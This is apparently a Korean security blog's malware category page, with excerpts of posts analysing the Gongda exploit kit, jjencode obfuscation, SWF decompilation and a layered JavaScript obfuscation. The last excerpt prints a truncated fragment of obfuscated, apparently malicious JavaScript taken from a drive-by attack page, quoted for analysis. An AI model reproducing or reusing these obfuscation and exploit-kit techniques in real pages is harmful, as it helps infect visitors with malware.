본문 바로가기

Information Security/Malware40

공다팩(Gondad EK) 분석 #01 01. Introduction 국내 공격을 많이 진행하고 있는 공다팩에 대해 연재하려고 한다. 공다팩은 자바스크립트 언어로 난독화된 특정 소스코드를 지칭하며, 해당 난독화를 해제하면 취약성을 가지는 코드를 이용하여 악성코드를 유포하는 자바스크립트 소스코드를 볼 수 있다. 국내 사용자들이 방문하는 웹 서버를 공격하여 웹 페이지를 변조하고, 공다팩 페이지로 방문하도록 유도하여 악성코드 감염을 노린다. 물론 여기서 방문은 사용자의 이벤트에 의한 브라우저의 방문이 아닌 소스코드에 의한 강제적인 브라우저의 방문에 해당한다. 즉, 드라이브 바이 다운로드 공격에서 공격 페이지(Exploit Page)에 사용되는 난독화 코드이다. 02. Pack? Kit? 기본적으로 다양한 웹킷들을 보고있자면, 팩이라는 단어와 킷이라.. 2014. 6. 27.
jjencode 분석 1. 개요 자바스크립트 난독화 중 jjencode라는 생소한 형태의 난독화가 있다. 이 난독화는 일본 연구가 하세가와 요스케(Yosuke HASEGAWA - 블로그)에 의해 만들어 졌고, 처음 공개된 것은 일본에서 열린 2009 JUI(JavaScript User Interface) 세미나이다. 자세한 공개 내용은 블로그에 공개된 발표자료를 통해 볼 수 있으며(다운로드) 생성 도구는 이곳에서 사용할 수 있다. 2. 목적 jjencode의 목적은 자바스크립트 기호로만 사용하여 자바스크립트와 (거의) 동등하게 동작하는 난독화 코드를 만드는 것이다. 3. 난독화 규칙 jjencode의 기본 규칙은 다음과 같다. 기호만 사용알파벳 금지숫자 금지US-ASCII 이외의 문자 금지사용 가능한 문자 !"#$%&'()*.. 2014. 3. 14.
Sothink SWF Decompiler 3.7 Shockwave Flash Player 파일의 Magic Signature은 SWFFWS이다. 하지만 이는 SWF 파일은 코드를 쉽게 볼 수 있기 때문에 SWF 파일의 컨텐츠 보호가 필요하게 되었다. 그래서 압축기술, 난독화 기술, 암호기술 등 생겼고, CWS라는 Magic Signature는 SWF 파일의 압축에 의해 생겨난 Signature이다. SWF의 Action Script 기능을 이용하여 악성코드 유포지로 활용하기도 하며, 때로는 악성 소프트웨어 위치를 SWF에 저장하기도 한다. 또한 Adobe Flash Player의 취약성을 SWF 파일에 담아 악성 소프트웨어 유포를 위한 취약점을 유발시키는 코드가 포함되기도 한다. 다음 도구는 CWS Magic Signature를 decompressor.. 2014. 1. 6.
알고리즘을 이용한 16진수 변형 + 메소드 치환 난독화 / DOM을 이용한 Script 실행 1. 개요 이 난독화는 몇몇 난독화들이 중복적으로 사용되어 있다. 1.1. 원본 소스코드 asq=function(){return n[i];};ww=window;ss=String.fromCharCode;try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}{try{whwej=~2;}catch(agdsg){whwej=0;}if(whwej){try{document.body++;}catch(bawetawe){if(ww.document){n="0xa,0xa,0x6a,0x67,0x21,0x29,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x.. 2014. 1. 2.